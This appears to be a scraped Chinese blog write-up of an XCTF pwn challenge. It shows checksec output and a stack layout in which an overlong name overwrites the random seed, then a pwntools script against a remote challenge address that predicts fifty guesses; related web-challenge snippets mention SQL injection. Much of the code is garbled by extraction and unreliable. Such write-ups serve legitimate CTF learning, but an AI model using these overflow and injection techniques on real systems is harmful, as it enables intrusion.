進過一小段時間的沉澱,發現自己是個小垃圾以外並沒有什麼收穫,還是繼續看看題過養老生活吧
題目鏈結
先檢查程式:沒有發現canary,有可能可以實現棧溢位操作
arch: amd64-64-littlerelro: full relro
stack: no canary found
nx: nx enabled
pie: pie enabled
放進ida進行靜態分析:emmm,和新手區的guess_number非常相似,這題
__int64 __fastcall main(__int64 a1, char **a2, char **a3)++v8;
} puts(
"bye bye!");
return
0ll;
}
sub_a20():
signed __int64 sub_a20()else
} else
return
result;
}
想要乙隻連續猜中50次,首先需要控制它的seed,這裡可以通過輸入名字時通過buf覆蓋seed
-0000000000000050 buf db 55 dup(?)-0000000000000019 var_19 db ?
-0000000000000018 var_18 dq ?
-0000000000000010 seed dd 2 dup(?)
控制了seed後再根據他提供的libc來生成隨機數,這道題和guess_number基本一致,有不清楚的可以看我之前的那篇.
參考exp:
from pwn import *from ctypes import *io = remote("
220.249.52.133
",54506
)libc = cdll.loadlibrary("
libc.so.6")
io.recv()
payload = 0x40*"
a" + p64(0
)io.sendline(payload)
a =for i in range(50):)
print(a)
for i in
a: io.recv()
print(io.recv())
io.sendline(str(i))
io.interactive()
攻防世界 web(高階區)
瞅瞅高階區的,繼續總結。var t fl s a i e var n a h0l n var r g 得到flag 開啟場景鏈結 你可以瀏覽這個 嗎?no,i can t.檢視原始碼什麼都沒有,後面加上index.php。沒用,加上index.phps phps檔案就是php的源 檔案,通常用於提供...
攻防世界web高階區unfinish
有登入就可能有註冊,url欄register.php 先註冊乙個 註冊成功後跳轉到主頁,同時在主頁顯示使用者名稱 唔,鬼刀裡的冰公主,品味不錯,俺喜歡 先試著在註冊介面手注吧 構造插入的註冊語句 payload insert into tables values ema il 0 asci i su...
攻防世界web高階區warmup詳解
檢視原始碼發現source.php 我們直接訪問 發現hint.php 我們再訪問 flag not here,and flag in ffffllllaaaagggg 這裡提示我們flag在ffffllllaaaagggg裡面 那麼我們去看看source.php 直接定義了乙個類,他將file的值...